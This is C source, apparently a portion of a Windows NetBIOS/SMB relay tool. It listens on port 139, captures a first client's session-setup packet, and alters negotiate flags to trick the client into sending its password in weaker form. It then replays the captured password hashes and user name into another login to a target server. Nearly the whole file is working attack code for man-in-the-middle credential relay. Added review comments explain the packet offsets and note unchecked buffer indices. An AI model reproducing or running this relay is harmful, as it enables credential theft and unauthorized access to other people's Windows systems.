// Internet connectivity, only that the socket library could not start.
void testconnect()
{
   WSADATA wsaData;
   int     result;
   result= WSAStartup(MAKEWORD(1, 1), &wsaData);
   if (result != 0) {
        fprintf(stderr, "Your computer was not connected "
            "to the Internet at the time that "
            "this program was launched, or you "
            "do not have a 32-bit "
            "connection to the Internet.");
        exit(1);
   }
}    
// Encodes `servername` into the called-name slot of namebuff[5..36]:
// each of 16 bytes becomes two characters, 'A' + high nibble and
// 'A' + low nibble.  Once the string's NUL is reached the remaining
// positions are encoded from 0x20 (space padding).  namebuff[37] is the
// terminating NUL of the encoded name.
void set_servername( )
{
     int i,j;
     j=0;
     for(i=0;i<16;++i){
            name=servername[i] ;
          if(name==0) j=1;          // past the end of the name: pad
          if(j==1) name=0x20;
          namebuff[2*i+5]= ( (name >> 4) & 0x000F ) + 'A';
          namebuff[2*i+6]= (name & 0x000F) + 'A';
    }
    namebuff[37]=0;
}



// Handles the second inbound connection (fd4).  Called from openfd3()
// once the first client's login on fd3 succeeded (j==1) and until k is
// set.  The peer must match d_ip (argv here is argv[2]) unless d_ip is
// 0; otherwise the connection is dropped.  For an accepted peer it
// answers the NetBIOS session request, replays the saved 0x72 packet,
// and on a 0x73/0x75 packet splices the password and user-name fields
// saved from the first client (buff0x73) into this packet before
// sending it on fd3.
// Globals touched: fd4, s_in3, d_ip, server, i, k, buff, buff0x72,
// long73, strflg1/2, usernameaddress1/2, name.
void opensockfd4(argc,argv)
{
     printf("/n please use  the next ip login.");
    i=sizeof(struct sockaddr);
    fd4=accept(fd,&addr2,&i);
    memcpy(&s_in3,&addr2,15);           // NOTE(review): 15 of 16 bytes, as in main()
    s_in3.sin_family = AF_INET;
    s_in3.sin_port = htons(serverport);
    if(argc>=3)    {
        server=argv;
        d_ip = inet_addr(server);
    }
    if(d_ip==-1)    d_ip=inet_addr("127.0.0.1");
    // but it seems 127.0.0.1 cannot be used to reach NETBIOS?
       printf("/n the  next ip %s ", inet_ntoa(s_in3.sin_addr));
    if(s_in3.sin_addr.s_addr!=d_ip&&d_ip!=0)     closesocket(fd4);
    else {
              i = 1;
              ioctlsocket(fd4, FIONBIO, &i);   // non-blocking (argument should be u_long*)
              while(k==0){
                   buff[0]=0;
                   buff[8]=0;                  // SMB command byte (4-byte NetBIOS header + 4-byte "\xffSMB")
                   i=recv(fd4,buff,20480,0);
                   if(i==0) {
                            closesocket(fd4);
                            printf("/n fd4 close");
                            return;
                   }
                   if(memcmp(buff,namereq,3)==0) {
                             send(fd4,buff0x82,6,0);
                             printf("/n send name 0x82 packet.");
                   }
                   if(buff[8]==0x72) {
                         // copy the 8 header bytes at 0x1c (the request's
                         // correlation fields) into the saved reply, then
                         // replay it
                         memcpy(buff0x72+0x1c,buff+0x1c,8);
                         memcpy(buff,buff0x72,long72);
                         printf("/n send smb 0x72 packet .");
                         buff[0x25]=5;      // byte after WordCount (0x24) forced to 5
                         //run in win9x.the win9x netbios client use
                         //the client here probably has to be WIN9X; not known how WINNT / WIN2000 handle this.
                         send(fd4,buff,long72,0);
                   }
                   if(buff[8]==0x73||buff[8]==0x75) {
                         long73=i;
//                         memcpy(buff+0x1c,buff0x73+0x1c,8);
                         printf("/n send smb 0x73 packet .");
                         // 0x33 = first password length (0x24 + 0x0f, cf. [ebx+0Fh]
                         // in the VREDIR listing); 0x41 = first data byte
                         if(buff[0x33]==0x18) {
                              memcpy(buff+0x41,buff0x73+0x41,0x18);
                              // copy password
                              if(buff[0x35]==0x18) memcpy(buff+0x41+0x18,buff0x73+0x41+0x18,0x18);
                              // copy the next password
                              strflg1=buff0x73[0x0f];
                              strflg1&=0x80;
                              if(strflg1!=0) strflg1=1;
                              strflg2=buff[0x0f];
                              strflg2&=0x80;
                              if(strflg2!=0) strflg2=1;
                              //str is unicode ?
                              // user name starts after both password blocks; +1 pad when unicode
                              usernameaddress1=0x41+0x18+buff0x73[0x35]+strflg1;
                              usernameaddress2=0x41+0x18+buff[0x35]+strflg2;
                              name=1;
                              // NOTE(review): both cursors are derived from packet
                              // bytes and the loop stops only at a NUL in buff0x73;
                              // neither index is checked against the buffer size.
                              while(name!=0){
                                    name=buff0x73[usernameaddress1];
                                    if(strflg1==0) ++usernameaddress1;
                                    else usernameaddress1+=2;
                                    buff[usernameaddress2]=name;
                                    ++usernameaddress2;
                                    if(strflg2!=0) {
                                        ++usernameaddress2;
                                        buff[usernameaddress2]=0;
                                    }
                              }  
                              // copy user name; not rigorous, but workable.
                              printf("/n send the pass 0x%x bytes",long73);
                                
                         }
                         else printf("/n can't chang pass");
                         // buff[0x9]=0;
                         send(fd3,buff,long73,0);
//                         while(k==0){ //how best to handle this?
                               i=recv(fd3,buff,20480,0);
//                               if(i>0&&buff[0x9]==0) printf("/n now  login ok .");
//                               if(i>0) {
//                                   k=1;
//                                   send(fd4,buff,i,0);
//                                   printf("/n send fd4 0x73 packet 0x%x bytes",i);
//                               }  
//                         }
                         k=1;
//                         i=-1;
                          
                   }
              }
              

 
    }
}



// Reads the next packet from whichever client is current: fd2 (via
// recvfd2packet) while j==0, fd4 afterwards.  The byte count lands in
// the global i.  A zero-length read on fd4 closes it and clears k so
// openfd3() will accept a new fd4; on fd2 it only logs.
void  recvpacket()
{
      if(j==0) recvfd2packet();
      else     i=recv(fd4,buff,20480,0);
      if(i==0) {
            if(j==0) {
                printf("/n  fd2  close .");
                return;
            }
            else   {
                printf("/n  fd4  close ." );
                k=0;
                closesocket(fd4);
            }
        }
}

// Receives one packet from the first client (fd2) into buff and keeps a
// copy of the two packets the relay needs later: the 0x72 negotiate
// request (with bytes 0x0c..0x0f zeroed before forwarding) and the
// 0x73/0x75 packet that carries the credentials.  Sets i, k, buff0x72,
// buff0x73.
void  recvfd2packet()
{
    buff[0x8]=0;
    i=recv(fd2,buff,20480,0);
    if(buff[0x8]==0x72){
              memcpy(buff0x72,buff,i);
            // bytes 0x0c..0x0f fall in the SMB header's flags area
            memset(buff+0xc,0,4);
            //these are the flags of what the system supports; WIN2000 and WINNT differ here.
            //when either side is WINNT this is normally 0; when both are WIN2000 the later password exchange is different.
           //set it to 0 to trick the client into sending the encrypted password the WINNT way so it can be captured; WIN2000 may not cope well.
            printf("/n fd2 recv smb 0x72  packet ");
    }
    if(buff[0x8]==0x73||buff[0x8]==0x75){
              k=0;
              memcpy(buff0x73,buff,i);
              // 0x24 = WordCount; 0x0c instead of 0x0d is taken as a Win2000 hint
              if(buff0x73[0x24]==0x0c) printf("/n this is win2000 system ?");
              printf("/n get password from fd2.");
    }
}


// Resolves the relay target from argv (argv[1] in main()): a dotted
// IPv4 literal, else a host name via gethostbyname().  When no usable
// address results, d_ip stays -1 and loginhimself is set so each client
// is relayed back to itself.  Sets d_ip, server, he, loginhimself,
// s_in4.  Untyped K&R parameters, as for the other functions here.
void get_d_ip(argc,argv)
{
    d_ip=-1;
    if(argc>=2)    {
        server=argv;
        d_ip = inet_addr(server);
        if(d_ip==-1){
          he = gethostbyname(server);
          if(!he)  printf("/n Can't get the ip of %s !/n",server);
          else     memcpy(&d_ip, he->h_addr, 4);
        }    
    }
    if(d_ip==0) d_ip=-1;        // 0.0.0.0 is treated as "no target"
    if(d_ip==-1){
        loginhimself=1;
        printf("/n rnetbios the netbios ip.");
    }
    else   {
        loginhimself=0;
        printf("/n rnetbios to %s",server);
    }
     s_in4.sin_addr.s_addr=d_ip;
  
}

// Creates the listening socket fd on port 139, bound to all local
// addresses, with a backlog of 100.  None of socket/bind/listen is
// checked for failure; a bind failure (port already in use, which the
// text above says requires moving the system's own 139 listener) goes
// unnoticed until accept() fails.
void setserver()
{
    fd = socket(AF_INET, SOCK_STREAM,0);
    s_in.sin_family = AF_INET;
    s_in.sin_port = htons(serverport);
    s_in.sin_addr.s_addr = 0;
    i=sizeof(struct sockaddr);
       bind(fd,&s_in,i);
    listen(fd,100);
}

// Connects fd3 to the relay target (s_in2) and runs the relay loop:
// client packet -> target, target packet -> client.  A NetBIOS session
// request from the client is replaced by namebuff (the encoded
// *SMBSERVER name).  The target's 0x72 reply is saved in buff0x72; a
// 0x73/0x75 reply with a zero status byte while the saved client packet
// had a 0x18 password length marks the login as successful (j=1), after
// which fd2 is closed and opensockfd4() is used to accept a second
// client.  argv here is argv[2], forwarded to opensockfd4().
// Returns when connect() fails or fd3 is closed by the peer.
void openfd3(argc,argv)
{
   if(!connect(fd3, (struct sockaddr *)&s_in2, sizeof(struct sockaddr_in)))
        {
            i = 1;
            ioctlsocket(fd2, FIONBIO, &i);
            i = 1;
            ioctlsocket(fd3, FIONBIO, &i);

            while(1)
            {
                recvpacket();
            //    if(i==0){
            //   printf("/n fd2 or fd4 close.");
            //   break;
            //    }
                if(i>0)  {
                        if(memcmp(buff,namereq,3)==0)    send(fd3,namebuff,0x48,0);
                        else     {
                          send(fd3,buff,i,0);
                          printf("/n send fd3 0x%x packet", buff[8]);
                        }
              
                }
                buff[8]=0;
                // NOTE(review): reads at most 2048 bytes although buff holds 20480
                i=recv(fd3,buff,2048,0);
                if(i>0) printf("/n recv fd3 0x%x packet 0x%x bytes",buff[0x8],i);
                if(i>0&&j==0){
                   if(buff[8]==0x72) {
                      memcpy(buff0x72,buff,i);
                      long72=i;
                   }
                   if(buff[8]==0x73||buff[8]==0x75){
                       // 0x09 = first status byte of the reply; 0x33 = saved password length
                       if(buff[0x9]==0&&buff0x73[0x33]==0x18){
                          j=1;
                          closesocket(fd2);
                          printf("/n now fd2 login ok!");
                       }
                   }
                }
                if(i==0){
                   printf("/n fd3 colse .");
                   break;
                }
                   while(j==1&&k==0) opensockfd4(argc,argv);
                if(i>0) {
                   if(j==0)         send(fd2,buff,i,0);
                   else          {
                      printf("/n send fd4 0x%x packet",buff[0x8]);
                      send(fd4,buff,i,0);
                   }
                }
        }
        }
}
// Closes the listening socket and shuts Winsock down.  Not reached from
// main(), whose accept loop never terminates.
void out()
{
    closesocket(fd);
    WSACleanup( );
}